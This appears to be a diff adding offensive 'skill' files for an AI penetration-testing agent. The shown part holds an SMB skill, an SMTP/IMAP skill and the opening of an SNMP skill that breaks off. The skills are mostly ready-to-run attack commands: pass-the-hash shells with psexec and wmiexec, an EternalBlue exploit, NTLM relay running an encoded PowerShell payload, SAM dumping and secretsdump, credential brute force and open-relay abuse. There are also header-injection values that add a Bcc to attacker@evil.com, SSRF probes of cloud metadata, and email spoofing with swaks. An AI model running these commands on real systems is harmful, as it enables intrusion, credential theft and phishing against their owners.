- package/skills/offensive/airecon-fork/technologies-docker-container/SKILL.md +266 -0
- package/skills/offensive/airecon-fork/technologies-elasticsearch/SKILL.md +226 -0
- package/skills/offensive/airecon-fork/technologies-firebase-firestore/SKILL.md +213 -0
- package/skills/offensive/airecon-fork/technologies-frida-hooking/SKILL.md +387 -0
- package/skills/offensive/airecon-fork/technologies-gitlab-github/SKILL.md +259 -0
- package/skills/offensive/airecon-fork/technologies-jenkins/SKILL.md +256 -0
- package/skills/offensive/airecon-fork/technologies-kubernetes-pentest/SKILL.md +281 -0
- package/skills/offensive/airecon-fork/technologies-memcached/SKILL.md +230 -0
- package/skills/offensive/airecon-fork/technologies-mobile-app-pentesting/SKILL.md +105 -0
- package/skills/offensive/airecon-fork/technologies-mongodb/SKILL.md +257 -0
- package/skills/offensive/airecon-fork/technologies-nginx-apache/SKILL.md +280 -0
- package/skills/offensive/airecon-fork/technologies-observability-stack-attacks/SKILL.md +501 -0
- package/skills/offensive/airecon-fork/technologies-redis/SKILL.md +236 -0
- package/skills/offensive/airecon-fork/technologies-supabase/SKILL.md +270 -0
- package/skills/offensive/airecon-fork/technologies-tomcat/SKILL.md +232 -0
- package/skills/offensive/airecon-fork/tools-advanced-fuzzing/SKILL.md +351 -0
- package/skills/offensive/airecon-fork/tools-browser-automation/SKILL.md +300 -0
- package/skills/offensive/airecon-fork/tools-caido/SKILL.md +776 -0
- package/skills/offensive/airecon-fork/tools-code-review/SKILL.md +71 -0
- package/skills/offensive/airecon-fork/tools-dalfox/SKILL.md +189 -0
- package/skills/offensive/airecon-fork/tools-hashcat-john/SKILL.md +258 -0
- package/skills/offensive/airecon-fork/tools-impacket/SKILL.md +227 -0
- package/skills/offensive/airecon-fork/tools-install/SKILL.md +202 -0
- package/skills/offensive/airecon-fork/tools-metasploit/SKILL.md +270 -0
- package/skills/offensive/airecon-fork/tools-nmap/SKILL.md +211 -0
- package/skills/offensive/airecon-fork/tools-nuclei/SKILL.md +175 -0
- package/skills/offensive/airecon-fork/tools-reporting/SKILL.md +47 -0
- package/skills/offensive/airecon-fork/tools-scripting/SKILL.md +1939 -0
- package/skills/offensive/airecon-fork/tools-semgrep/SKILL.md +202 -0
- package/skills/offensive/airecon-fork/tools-source-audit/SKILL.md +308 -0
- package/skills/offensive/airecon-fork/tools-sqlmap/SKILL.md +137 -0
- package/skills/offensive/airecon-fork/tools-tool-catalog/SKILL.md +320 -0
- package/skills/offensive/airecon-fork/tools-wapiti/SKILL.md +293 -0
- package/skills/offensive/airecon-fork/vulnerabilities-2fa-bypass/SKILL.md +219 -0
- package/skills/offensive/airecon-fork/vulnerabilities-account-takeover/SKILL.md +223 -0
- package/skills/offensive/airecon-fork/vulnerabilities-api-schema-exposure/SKILL.md +849 -0
- package/skills/offensive/airecon-fork/vulnerabilities-api-testing/SKILL.md +278 -0
- package/skills/offensive/airecon-fork/vulnerabilities-auth-workflow/SKILL.md +252 -0
- package/skills/offensive/airecon-fork/vulnerabilities-authentication-jwt/SKILL.md +158 -0
- package/skills/offensive/airecon-fork/vulnerabilities-bfla/SKILL.md +156 -0
- package/skills/offensive/airecon-fork/vulnerabilities-blind-xss/SKILL.md +111 -0
- package/skills/offensive/airecon-fork/vulnerabilities-business-logic/SKILL.md +313 -0
- package/skills/offensive/airecon-fork/vulnerabilities-cors/SKILL.md +242 -0
- package/skills/offensive/airecon-fork/vulnerabilities-crlf-injection/SKILL.md +146 -0
- package/skills/offensive/airecon-fork/vulnerabilities-csrf/SKILL.md +200 -0
- package/skills/offensive/airecon-fork/vulnerabilities-csrf-advanced-bypass/SKILL.md +536 -0
- package/skills/offensive/airecon-fork/vulnerabilities-deserialization/SKILL.md +363 -0
- package/skills/offensive/airecon-fork/vulnerabilities-dom-based-vulnerabilities/SKILL.md +105 -0
- package/skills/offensive/airecon-fork/vulnerabilities-exploitation/SKILL.md +286 -0
- package/skills/offensive/airecon-fork/vulnerabilities-grpc/SKILL.md +123 -0
- package/skills/offensive/airecon-fork/vulnerabilities-host-header-injection/SKILL.md +169 -0
- package/skills/offensive/airecon-fork/vulnerabilities-http-smuggling/SKILL.md +411 -0
- package/skills/offensive/airecon-fork/vulnerabilities-idor/SKILL.md +705 -0
- package/skills/offensive/airecon-fork/vulnerabilities-information-disclosure/SKILL.md +867 -0
- package/skills/offensive/airecon-fork/vulnerabilities-insecure-file-uploads/SKILL.md +190 -0
- package/skills/offensive/airecon-fork/vulnerabilities-jwt-attacks/SKILL.md +270 -0
- package/skills/offensive/airecon-fork/vulnerabilities-kubernetes/SKILL.md +252 -0
- package/skills/offensive/airecon-fork/vulnerabilities-mass-assignment/SKILL.md +788 -0
- package/skills/offensive/airecon-fork/vulnerabilities-nosql-injection/SKILL.md +204 -0
- package/skills/offensive/airecon-fork/vulnerabilities-oauth-misconfig/SKILL.md +220 -0
- package/skills/offensive/airecon-fork/vulnerabilities-oauth-saml/SKILL.md +163 -0
- package/skills/offensive/airecon-fork/vulnerabilities-open-redirect/SKILL.md +167 -0
- package/skills/offensive/airecon-fork/vulnerabilities-password-reset-poisoning/SKILL.md +66 -0
- package/skills/offensive/airecon-fork/vulnerabilities-path-traversal/SKILL.md +192 -0
- package/skills/offensive/airecon-fork/vulnerabilities-privilege-escalation/SKILL.md +320 -0
- package/skills/offensive/airecon-fork/vulnerabilities-prototype-pollution/SKILL.md +242 -0
- package/skills/offensive/airecon-fork/vulnerabilities-race-conditions/SKILL.md +192 -0
- package/skills/offensive/airecon-fork/vulnerabilities-rce/SKILL.md +240 -0
- package/skills/offensive/airecon-fork/vulnerabilities-sensitive-file-pii-exposure/SKILL.md +589 -0
- package/skills/offensive/airecon-fork/vulnerabilities-spring4shell/SKILL.md +86 -0
- package/skills/offensive/airecon-fork/vulnerabilities-sql-injection/SKILL.md +313 -0
- package/skills/offensive/airecon-fork/vulnerabilities-ssrf/SKILL.md +183 -0
- package/skills/offensive/airecon-fork/vulnerabilities-ssti/SKILL.md +344 -0
- package/skills/offensive/airecon-fork/vulnerabilities-subdomain-takeover/SKILL.md +160 -0
- package/skills/offensive/airecon-fork/vulnerabilities-supply-chain/SKILL.md +125 -0
- package/skills/offensive/airecon-fork/vulnerabilities-unhandled-exception-differential/SKILL.md +742 -0
- package/skills/offensive/airecon-fork/vulnerabilities-waf-detection/SKILL.md +90 -0
- package/skills/offensive/airecon-fork/vulnerabilities-web-cache-poisoning/SKILL.md +233 -0
- package/skills/offensive/airecon-fork/vulnerabilities-websocket/SKILL.md +180 -0
- package/skills/offensive/airecon-fork/vulnerabilities-xss/SKILL.md +316 -0
- package/skills/offensive/airecon-fork/vulnerabilities-xxe/SKILL.md +222 -0
- package/skills/offensive/matty-fork/cicd-redteam/SKILL.md +531 -0
- package/skills/offensive/matty-fork/cloud-security/SKILL.md +106 -0
- package/skills/offensive/matty-fork/container-escape/SKILL.md +174 -0
- package/skills/offensive/matty-fork/mobile-pentester/SKILL.md +357 -0
- package/skills/offensive/matty-fork/subdomain-takeover/SKILL.md +154 -0
- package/skills/osint/elementalsouls-fork/offensive-osint/README.md +92 -0
- package/skills/osint/elementalsouls-fork/offensive-osint/SKILL.md +4177 -0
- package/skills/osint/elementalsouls-fork/osint-methodology/README.md +66 -0
- package/skills/osint/elementalsouls-fork/osint-methodology/SKILL.md +1695 -0
|
@@ -0,0 +1,191 @@
|
|
|
1
|
+
<!-- aegis-local: forked 2026-05-04 from pikpikcu/airecon@9a21453459d87eefb012ea355c79b593d0d3c0cc (MIT-licensed); attribution preserved, see ATTRIBUTION.md -->
|
|
2
|
+
|
|
3
|
+
---
|
|
4
|
+
name: smb
|
|
5
|
+
description: SMB/NetBIOS security testing — null session, share enumeration, EternalBlue, pass-the-hash, relay attacks, crackmapexec, smbclient, and SMB-specific CVEs
|
|
6
|
+
---
|
|
7
|
+
|
|
8
|
+
# SMB / NetBIOS Security Testing
|
|
9
|
+
|
|
10
|
+
SMB (Server Message Block) = Windows file sharing protocol. Critical attack surface: null sessions, share enumeration, EternalBlue (MS17-010), pass-the-hash, NTLM relay, and credential brute force.
|
|
11
|
+
|
|
12
|
+
**Install:**
|
|
13
|
+
```
|
|
14
|
+
sudo apt-get install -y smbclient smbmap crackmapexec enum4linux-ng rpcclient impacket-scripts
|
|
15
|
+
pip install impacket --break-system-packages
|
|
16
|
+
# netexec (newer crackmapexec):
|
|
17
|
+
pip install netexec --break-system-packages
|
|
18
|
+
```
|
|
19
|
+
|
|
20
|
+
**Ports:** 139 (NetBIOS), 445 (SMB direct)
|
|
21
|
+
|
|
22
|
+
---
|
|
23
|
+
|
|
24
|
+
## Reconnaissance
|
|
25
|
+
|
|
26
|
+
nmap -p 139,445 <target> -sV --open
|
|
27
|
+
nmap -p 445 <target> --script smb-security-mode,smb-enum-shares,smb-vuln-ms17-010
|
|
28
|
+
|
|
29
|
+
# OS + version detection:
|
|
30
|
+
crackmapexec smb <target>
|
|
31
|
+
# Returns: OS version, hostname, domain, signing status
|
|
32
|
+
|
|
33
|
+
---
|
|
34
|
+
|
|
35
|
+
## Null Session / Anonymous Access
|
|
36
|
+
|
|
37
|
+
# smbclient — null session (no credentials):
|
|
38
|
+
smbclient -L //<target>/ -N # List shares, no password
|
|
39
|
+
smbclient //<target>/share -N # Connect to share
|
|
40
|
+
|
|
41
|
+
# smbmap — check share permissions:
|
|
42
|
+
smbmap -H <target> # Null session
|
|
43
|
+
smbmap -H <target> -u "" -p "" # Explicit null
|
|
44
|
+
|
|
45
|
+
# enum4linux-ng — comprehensive enumeration:
|
|
46
|
+
enum4linux-ng <target> # All info (users, shares, policies)
|
|
47
|
+
enum4linux-ng -A <target> # All checks
|
|
48
|
+
|
|
49
|
+
# rpcclient — null session:
|
|
50
|
+
rpcclient -U "" -N <target>
|
|
51
|
+
rpcclient> enumdomusers # List domain users
|
|
52
|
+
rpcclient> enumdomgroups # List groups
|
|
53
|
+
rpcclient> querydominfo # Domain info
|
|
54
|
+
rpcclient> netshareenum # Shares
|
|
55
|
+
|
|
56
|
+
---
|
|
57
|
+
|
|
58
|
+
## Authenticated Enumeration
|
|
59
|
+
|
|
60
|
+
# smbclient with credentials:
|
|
61
|
+
smbclient -L //<target>/ -U "domain\\username%password"
|
|
62
|
+
smbclient //<target>/C$ -U "admin%password" # Admin share
|
|
63
|
+
|
|
64
|
+
# smbmap:
|
|
65
|
+
smbmap -H <target> -u username -p password
|
|
66
|
+
smbmap -H <target> -u username -p password -r sharename # Recursive list
|
|
67
|
+
smbmap -H <target> -u username -p password --download 'sharename\path\file.txt'
|
|
68
|
+
|
|
69
|
+
# crackmapexec:
|
|
70
|
+
crackmapexec smb <target> -u username -p password --shares
|
|
71
|
+
crackmapexec smb <target> -u username -p password --users
|
|
72
|
+
crackmapexec smb <target> -u username -p password --groups
|
|
73
|
+
crackmapexec smb <target> -u username -p password --sessions
|
|
74
|
+
crackmapexec smb <target> -u username -p password -x "whoami" # Execute command
|
|
75
|
+
|
|
76
|
+
---
|
|
77
|
+
|
|
78
|
+
## Pass-the-Hash (PTH)
|
|
79
|
+
|
|
80
|
+
NTLM authentication can use hash directly — no plaintext password needed:
|
|
81
|
+
|
|
82
|
+
# smbclient with NTLM hash:
|
|
83
|
+
smbclient //<target>/C$ -U "administrator" --pw-nt-hash <NTLM_hash>
|
|
84
|
+
|
|
85
|
+
# crackmapexec PTH:
|
|
86
|
+
crackmapexec smb <target> -u administrator -H <NTLM_hash>
|
|
87
|
+
crackmapexec smb <target> -u administrator -H <NTLM_hash> -x "whoami"
|
|
88
|
+
|
|
89
|
+
# impacket psexec (full shell):
|
|
90
|
+
psexec.py administrator@<target> -hashes :<NTLM_hash>
|
|
91
|
+
|
|
92
|
+
# impacket wmiexec:
|
|
93
|
+
wmiexec.py administrator@<target> -hashes :<NTLM_hash>
|
|
94
|
+
|
|
95
|
+
# impacket smbexec:
|
|
96
|
+
smbexec.py administrator@<target> -hashes :<NTLM_hash>
|
|
97
|
+
|
|
98
|
+
---
|
|
99
|
+
|
|
100
|
+
## Brute Force
|
|
101
|
+
|
|
102
|
+
# crackmapexec credential spray:
|
|
103
|
+
crackmapexec smb <target> -u users.txt -p passwords.txt --continue-on-success
|
|
104
|
+
crackmapexec smb <target> -u administrator -p /usr/share/wordlists/rockyou.txt
|
|
105
|
+
|
|
106
|
+
# hydra:
|
|
107
|
+
hydra -l administrator -P /usr/share/wordlists/rockyou.txt smb://<target>
|
|
108
|
+
|
|
109
|
+
---
|
|
110
|
+
|
|
111
|
+
## EternalBlue — MS17-010 (Windows 7/2008R2 without patch)
|
|
112
|
+
|
|
113
|
+
# Check vulnerability:
|
|
114
|
+
nmap -p 445 --script smb-vuln-ms17-010 <target>
|
|
115
|
+
crackmapexec smb <target> -M ms17-010
|
|
116
|
+
|
|
117
|
+
# Metasploit:
|
|
118
|
+
use exploit/windows/smb/ms17_010_eternalblue
|
|
119
|
+
set RHOSTS <target>
|
|
120
|
+
set LHOST <attacker>
|
|
121
|
+
run
|
|
122
|
+
|
|
123
|
+
# Python exploit (no Metasploit):
|
|
124
|
+
# git clone https://github.com/helviojunior/MS17-010 /home/pentester/tools/MS17-010
|
|
125
|
+
python3 /home/pentester/tools/MS17-010/send_and_execute.py <target> shell.exe
|
|
126
|
+
|
|
127
|
+
---
|
|
128
|
+
|
|
129
|
+
## SMB Relay Attack (NTLM Relay)
|
|
130
|
+
|
|
131
|
+
If SMB signing is DISABLED on target (common on workstations):
|
|
132
|
+
|
|
133
|
+
# Step 1: Check signing status:
|
|
134
|
+
crackmapexec smb <network>/24 --gen-relay-list relay_targets.txt
|
|
135
|
+
nmap -p 445 --script smb-security-mode <target> | grep "message signing"
|
|
136
|
+
|
|
137
|
+
# Step 2: Setup Responder (capture NTLM hashes):
|
|
138
|
+
# Edit /etc/responder/Responder.conf → SMB = Off, HTTP = Off (relay mode)
|
|
139
|
+
sudo responder -I eth0 -dwP
|
|
140
|
+
|
|
141
|
+
# Step 3: Relay with impacket:
|
|
142
|
+
sudo ntlmrelayx.py -tf relay_targets.txt -smb2support
|
|
143
|
+
# When victim authenticates → relay to target → get shell or dump SAM
|
|
144
|
+
|
|
145
|
+
# With command execution:
|
|
146
|
+
sudo ntlmrelayx.py -tf relay_targets.txt -smb2support -c "powershell -enc <b64_payload>"
|
|
147
|
+
|
|
148
|
+
---
|
|
149
|
+
|
|
150
|
+
## CVE Coverage
|
|
151
|
+
|
|
152
|
+
| CVE | Name | Impact |
|
|
153
|
+
|-----|------|--------|
|
|
154
|
+
| CVE-2017-0144 | EternalBlue | RCE (MS17-010) |
|
|
155
|
+
| CVE-2020-0796 | SMBGhost | RCE (SMBv3.1.1) |
|
|
156
|
+
| CVE-2021-36942 | PetitPotam | NTLM relay via EFS |
|
|
157
|
+
| CVE-2022-26925 | PrintNightmare (LS) | NTLM relay |
|
|
158
|
+
|
|
159
|
+
# SMBGhost check:
|
|
160
|
+
nmap -p 445 --script smb-vuln-cve-2020-0796 <target>
|
|
161
|
+
|
|
162
|
+
---
|
|
163
|
+
|
|
164
|
+
## Sensitive File Access
|
|
165
|
+
|
|
166
|
+
# Once share access obtained:
|
|
167
|
+
smbclient //<target>/C$ -U "admin%pass"
|
|
168
|
+
smb> ls
|
|
169
|
+
smb> get SAM # C:\Windows\System32\config\SAM (need SYSTEM too)
|
|
170
|
+
smb> get SYSTEM
|
|
171
|
+
smb> recurse ON
|
|
172
|
+
smb> prompt OFF
|
|
173
|
+
smb> mget * # Download all files
|
|
174
|
+
|
|
175
|
+
# Secretsdump from SAM + SYSTEM:
|
|
176
|
+
secretsdump.py LOCAL -sam SAM -system SYSTEM -ntds NTDS.dit
|
|
177
|
+
|
|
178
|
+
---
|
|
179
|
+
|
|
180
|
+
## Pro Tips
|
|
181
|
+
|
|
182
|
+
1. `crackmapexec smb <subnet>/24` scans entire subnet for SMB hosts and their OS versions
|
|
183
|
+
2. SMB signing disabled = relay attack possible — check with `crackmapexec --gen-relay-list`
|
|
184
|
+
3. Pass-the-hash via `crackmapexec -H` — no cracking required if you have the hash
|
|
185
|
+
4. `smbmap -H target -r` recursively lists all readable shares — often finds sensitive docs
|
|
186
|
+
5. EternalBlue still active on unpatched Windows 7/2008R2 — always check with nmap script
|
|
187
|
+
6. `enum4linux-ng` reveals domain users, password policies, and group memberships anonymously
|
|
188
|
+
|
|
189
|
+
## Summary
|
|
190
|
+
|
|
191
|
+
SMB testing: null session (`smbclient -N`) → share enumeration (`smbmap`, `enum4linux-ng`) → credential brute (`crackmapexec`) → pass-the-hash (`crackmapexec -H`, `psexec.py`) → EternalBlue check (`nmap smb-vuln-ms17-010`) → SMB relay if signing disabled (`ntlmrelayx.py`).
|
|
@@ -0,0 +1,263 @@
|
|
|
1
|
+
<!-- aegis-local: forked 2026-05-04 from pikpikcu/airecon@9a21453459d87eefb012ea355c79b593d0d3c0cc (MIT-licensed); attribution preserved, see ATTRIBUTION.md -->
|
|
2
|
+
|
|
3
|
+
---
|
|
4
|
+
name: smtp-imap
|
|
5
|
+
description: SMTP and IMAP security testing covering open relay, email header injection, user enumeration, credential brute force, and SMTP as SSRF pivot
|
|
6
|
+
---
|
|
7
|
+
|
|
8
|
+
# SMTP / IMAP Security Testing
|
|
9
|
+
|
|
10
|
+
Email protocols are often overlooked but are critical attack surface in pentests. Attack surface: open relay (spam pivot), SMTP user enumeration, email header injection (phishing pivot), credential brute force, and SMTP as SSRF vector.
|
|
11
|
+
|
|
12
|
+
---
|
|
13
|
+
|
|
14
|
+
## Reconnaissance
|
|
15
|
+
|
|
16
|
+
### Discovery
|
|
17
|
+
|
|
18
|
+
# Port scanning for email services
|
|
19
|
+
nmap -p 25,465,587,110,143,993,995 <target> -sV --open
|
|
20
|
+
|
|
21
|
+
# Ports:
|
|
22
|
+
# 25 — SMTP (submission/relay)
|
|
23
|
+
# 465 — SMTPS (SMTP over TLS — legacy)
|
|
24
|
+
# 587 — Submission (authenticated SMTP)
|
|
25
|
+
# 110 — POP3
|
|
26
|
+
# 143 — IMAP
|
|
27
|
+
# 993 — IMAPS (IMAP over TLS)
|
|
28
|
+
# 995 — POP3S (POP3 over TLS)
|
|
29
|
+
|
|
30
|
+
### Banner Grabbing
|
|
31
|
+
|
|
32
|
+
nc <target> 25
|
|
33
|
+
EHLO test.com
|
|
34
|
+
# Server responds with capabilities: AUTH, STARTTLS, SIZE, etc.
|
|
35
|
+
|
|
36
|
+
# Capture banner
|
|
37
|
+
nmap -p 25 <target> --script smtp-commands,smtp-open-relay,smtp-ntlm-info
|
|
38
|
+
|
|
39
|
+
---
|
|
40
|
+
|
|
41
|
+
## SMTP User Enumeration
|
|
42
|
+
|
|
43
|
+
Three methods: VRFY, EXPN, RCPT TO (most common):
|
|
44
|
+
|
|
45
|
+
### VRFY Method
|
|
46
|
+
|
|
47
|
+
# VRFY verifies if a user exists
|
|
48
|
+
nc <target> 25
|
|
49
|
+
EHLO attacker.com
|
|
50
|
+
VRFY root # "252 2.0.0 root" = valid | "550 5.1.1" = invalid
|
|
51
|
+
VRFY admin
|
|
52
|
+
VRFY postmaster
|
|
53
|
+
|
|
54
|
+
### EXPN Method
|
|
55
|
+
|
|
56
|
+
# EXPN expands a mailing list (often more verbose)
|
|
57
|
+
nc <target> 25
|
|
58
|
+
EHLO attacker.com
|
|
59
|
+
EXPN admin # "250 admin@domain.com" = valid
|
|
60
|
+
EXPN mailing-list # Lists all members
|
|
61
|
+
|
|
62
|
+
### RCPT TO Method (Most Common — Works When VRFY/EXPN Disabled)
|
|
63
|
+
|
|
64
|
+
# Send an email to each username — different responses for valid vs invalid
|
|
65
|
+
nc <target> 25
|
|
66
|
+
EHLO attacker.com
|
|
67
|
+
MAIL FROM: <test@attacker.com>
|
|
68
|
+
RCPT TO: <admin@target.com> # "250 OK" = valid | "550 User unknown" = invalid
|
|
69
|
+
RCPT TO: <root@target.com>
|
|
70
|
+
|
|
71
|
+
### Automated Enumeration
|
|
72
|
+
|
|
73
|
+
# smtp-user-enum
|
|
74
|
+
smtp-user-enum -M VRFY -U /usr/share/wordlists/usernames.txt -t <target>
|
|
75
|
+
smtp-user-enum -M RCPT -U /usr/share/seclists/Usernames/top-usernames-shortlist.txt -t <target> -D target.com
|
|
76
|
+
|
|
77
|
+
# nmap script
|
|
78
|
+
nmap --script smtp-enum-users <target> -p 25
|
|
79
|
+
|
|
80
|
+
# Metasploit
|
|
81
|
+
use auxiliary/scanner/smtp/smtp_enum
|
|
82
|
+
|
|
83
|
+
---
|
|
84
|
+
|
|
85
|
+
## Open Relay Testing
|
|
86
|
+
|
|
87
|
+
Open relay = SMTP server relays email from any source to any destination (spam abuse, phishing pivot):
|
|
88
|
+
|
|
89
|
+
# Manual test: attempt to relay email through target
|
|
90
|
+
nc <target> 25
|
|
91
|
+
EHLO test.com
|
|
92
|
+
MAIL FROM: <attacker@evil.com>
|
|
93
|
+
RCPT TO: <victim@gmail.com> # External domain — should be rejected
|
|
94
|
+
DATA
|
|
95
|
+
From: attacker@evil.com
|
|
96
|
+
To: victim@gmail.com
|
|
97
|
+
Subject: Relay Test
|
|
98
|
+
This is a test.
|
|
99
|
+
.
|
|
100
|
+
QUIT
|
|
101
|
+
|
|
102
|
+
# If "250 OK" after RCPT TO and DATA → open relay confirmed
|
|
103
|
+
|
|
104
|
+
# nmap automatic check
|
|
105
|
+
nmap --script smtp-open-relay <target> -p 25
|
|
106
|
+
|
|
107
|
+
# Test all relay bypass techniques:
|
|
108
|
+
RCPT TO: <victim@gmail.com>
|
|
109
|
+
RCPT TO: <@target.com:victim@gmail.com> # Old source routing
|
|
110
|
+
RCPT TO: <victim%gmail.com@target.com> # Percent-encoded
|
|
111
|
+
RCPT TO: <"victim@gmail.com"> # Quoted
|
|
112
|
+
RCPT TO: <victim@gmail.com@target.com> # Double domain
|
|
113
|
+
|
|
114
|
+
---
|
|
115
|
+
|
|
116
|
+
## Email Header Injection
|
|
117
|
+
|
|
118
|
+
When user input (name, email, subject) is included directly in email headers:
|
|
119
|
+
|
|
120
|
+
# Vulnerable: name field used directly in From: header
|
|
121
|
+
# Inject CRLF + new headers:
|
|
122
|
+
|
|
123
|
+
# Basic injection (name field):
|
|
124
|
+
"attacker\r\nBcc: victim@target.com"
|
|
125
|
+
"attacker\nCC: victim2@target.com"
|
|
126
|
+
|
|
127
|
+
# Complete additional message injection:
|
|
128
|
+
"attacker\r\nCc: victim@target.com\r\nBcc: external@attacker.com"
|
|
129
|
+
|
|
130
|
+
# Subject line injection:
|
|
131
|
+
"Normal Subject\r\nTo: victim@evil.com"
|
|
132
|
+
|
|
133
|
+
# Test all input fields in contact forms, registration emails, password reset:
|
|
134
|
+
name: "Test\r\nBcc: attacker@evil.com"
|
|
135
|
+
email: "user@example.com\r\nBcc: attacker@evil.com"
|
|
136
|
+
|
|
137
|
+
---
|
|
138
|
+
|
|
139
|
+
## SMTP Authentication Brute Force
|
|
140
|
+
|
|
141
|
+
# Using hydra
|
|
142
|
+
hydra -l admin@target.com -P /usr/share/wordlists/rockyou.txt smtp://<target> -V -s 587
|
|
143
|
+
hydra -L users.txt -P passwords.txt smtp://<target>:587 -S # SSL
|
|
144
|
+
|
|
145
|
+
# Medusa
|
|
146
|
+
medusa -h <target> -u admin@target.com -P /usr/share/wordlists/rockyou.txt -M smtp -n 587
|
|
147
|
+
|
|
148
|
+
# nmap brute
|
|
149
|
+
nmap --script smtp-brute -p 25 <target>
|
|
150
|
+
|
|
151
|
+
---
|
|
152
|
+
|
|
153
|
+
## IMAP Enumeration and Brute Force
|
|
154
|
+
|
|
155
|
+
# Manual IMAP connection
|
|
156
|
+
nc <target> 143
|
|
157
|
+
a001 CAPABILITY # List capabilities
|
|
158
|
+
a002 LOGIN user@domain.com pass # Authenticate
|
|
159
|
+
|
|
160
|
+
# With IMAPS (TLS):
|
|
161
|
+
openssl s_client -connect <target>:993 -quiet
|
|
162
|
+
a001 CAPABILITY
|
|
163
|
+
a002 LOGIN user@domain.com pass
|
|
164
|
+
|
|
165
|
+
# After auth — list and read mailboxes:
|
|
166
|
+
a003 LIST "" "*" # List all folders
|
|
167
|
+
a004 SELECT INBOX # Select inbox
|
|
168
|
+
a005 FETCH 1:* (ENVELOPE) # List all messages
|
|
169
|
+
a006 FETCH 1 BODY[] # Read first message (full)
|
|
170
|
+
a007 FETCH 1 BODY[HEADER] # Headers only
|
|
171
|
+
|
|
172
|
+
# Brute force IMAP:
|
|
173
|
+
hydra -l user@domain.com -P /usr/share/wordlists/rockyou.txt imap://<target>
|
|
174
|
+
hydra -L users.txt -P pass.txt imaps://<target>
|
|
175
|
+
|
|
176
|
+
---
|
|
177
|
+
|
|
178
|
+
## SMTP as SSRF Vector
|
|
179
|
+
|
|
180
|
+
When a web app allows configuring SMTP server or sending emails, use it as SSRF:
|
|
181
|
+
|
|
182
|
+
# Test internal SMTP (if web app has "email settings" configuration):
|
|
183
|
+
SMTP Host: 169.254.169.254 # AWS IMDS
|
|
184
|
+
SMTP Host: localhost
|
|
185
|
+
SMTP Host: 127.0.0.1:22 # Port probe
|
|
186
|
+
SMTP Host: 127.0.0.1:6379 # Redis probe
|
|
187
|
+
|
|
188
|
+
# SMTP for port scanning internal network:
|
|
189
|
+
SMTP Host: 10.0.0.1 Port: 22 → connection refused vs timeout = port state
|
|
190
|
+
|
|
191
|
+
---
|
|
192
|
+
|
|
193
|
+
## STARTTLS Strip / Downgrade
|
|
194
|
+
|
|
195
|
+
# Test if STARTTLS is enforced or can be stripped:
|
|
196
|
+
nc <target> 587
|
|
197
|
+
EHLO test.com
|
|
198
|
+
# If server lists STARTTLS but allows plaintext auth:
|
|
199
|
+
AUTH PLAIN <base64(user:pass)> # Without STARTTLS — plaintext credential exposure
|
|
200
|
+
|
|
201
|
+
# nmap check:
|
|
202
|
+
nmap --script smtp-starttls-helo <target> -p 587
|
|
203
|
+
|
|
204
|
+
---
|
|
205
|
+
|
|
206
|
+
## SMTP Information Disclosure
|
|
207
|
+
|
|
208
|
+
# NTLM information disclosure via AUTH NTLM:
|
|
209
|
+
nc <target> 25
|
|
210
|
+
EHLO test.com
|
|
211
|
+
AUTH NTLM TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA=
|
|
212
|
+
# Server responds with NTLM challenge revealing: domain name, server name, OS version
|
|
213
|
+
|
|
214
|
+
# nmap script:
|
|
215
|
+
nmap --script smtp-ntlm-info <target> -p 25,587
|
|
216
|
+
|
|
217
|
+
---
|
|
218
|
+
|
|
219
|
+
## SPF / DKIM / DMARC Analysis
|
|
220
|
+
|
|
221
|
+
# DNS records — check email authentication policy
|
|
222
|
+
dig TXT <target.com> | grep -i spf
|
|
223
|
+
dig TXT _dmarc.<target.com>
|
|
224
|
+
dig TXT default._domainkey.<target.com> # DKIM
|
|
225
|
+
|
|
226
|
+
# Missing/weak SPF:
|
|
227
|
+
# "v=spf1 +all" = anyone can send as domain (critical)
|
|
228
|
+
# "v=spf1 ... ~all" = softfail (spoofing possible in some cases)
|
|
229
|
+
# No SPF record = no protection
|
|
230
|
+
|
|
231
|
+
# No DMARC = no enforcement even with SPF/DKIM
|
|
232
|
+
# DMARC p=none = monitoring only (spoofing emails still deliver)
|
|
233
|
+
|
|
234
|
+
# Test spoofing possibility:
|
|
235
|
+
# Use swaks or sendemail to test if spoofed email is delivered
|
|
236
|
+
swaks --to victim@target.com --from ceo@target.com \
|
|
237
|
+
--server mail.<target.com> --body "Spoofed email test"
|
|
238
|
+
|
|
239
|
+
---
|
|
240
|
+
|
|
241
|
+
## Key Tools
|
|
242
|
+
|
|
243
|
+
smtp-user-enum # VRFY/EXPN/RCPT user enumeration
|
|
244
|
+
swaks # Swiss Army Knife for SMTP testing
|
|
245
|
+
hydra # Auth brute force
|
|
246
|
+
nmap smtp-* # Relay, enum, NTLM, open-relay scripts
|
|
247
|
+
mxtoolbox.com # Online SPF/DKIM/DMARC analysis
|
|
248
|
+
|
|
249
|
+
---
|
|
250
|
+
|
|
251
|
+
## Pro Tips
|
|
252
|
+
|
|
253
|
+
1. RCPT TO enumeration works even when VRFY and EXPN are disabled — always try it
|
|
254
|
+
2. Open relay allows sending spoofed emails through victim's mail server — instant phishing pivot
|
|
255
|
+
3. Header injection in contact forms is common and enables SPAM/phishing from trusted domain
|
|
256
|
+
4. SMTP NTLM disclosure (AUTH NTLM) reveals internal domain name + server info without credentials
|
|
257
|
+
5. DMARC `p=none` = no rejection of spoofed emails — domain is spoofable for phishing
|
|
258
|
+
6. After compromising SMTP credentials, read IMAP mailbox for plaintext credentials in old emails
|
|
259
|
+
7. SPF `+all` (pass all) is a critical misconfiguration — any server can send as the domain
|
|
260
|
+
|
|
261
|
+
## Summary
|
|
262
|
+
|
|
263
|
+
SMTP/IMAP testing = open relay check + user enumeration (RCPT TO) + header injection + brute force credentials. Open relay is the most impactful finding — it enables sending phishing emails from the victim's mail server. Header injection in web forms is the most common finding. Always check SPF/DKIM/DMARC for domain spoofing assessment.
|
|
@@ -0,0 +1,147 @@
|
|
|
1
|
+
<!-- aegis-local: forked 2026-05-04 from pikpikcu/airecon@9a21453459d87eefb012ea355c79b593d0d3c0cc (MIT-licensed); attribution preserved, see ATTRIBUTION.md -->
|
|
2
|
+
|
|
3
|
+
---
|
|
4
|
+
name: snmp
|
|
5
|
+
description: SNMP security testing — community string enumeration, MIB walking, SNMP v1/v2c/v3 brute force, information disclosure, and device configuration extraction
|
|
6
|
+
---
|
|
7
|
+
|
|
8
|
+
# SNMP Security Testing
|
|
9
|
+
|
|
10
|
+
SNMP (Simple Network Management Protocol) — device management protocol. Default community strings `public`/`private` grant full read/write access. Exposes: system info, routing tables, running processes, interface IPs, installed software.
|
|
11
|
+
|
|
12
|
+
**Install:**
|
|
13
|
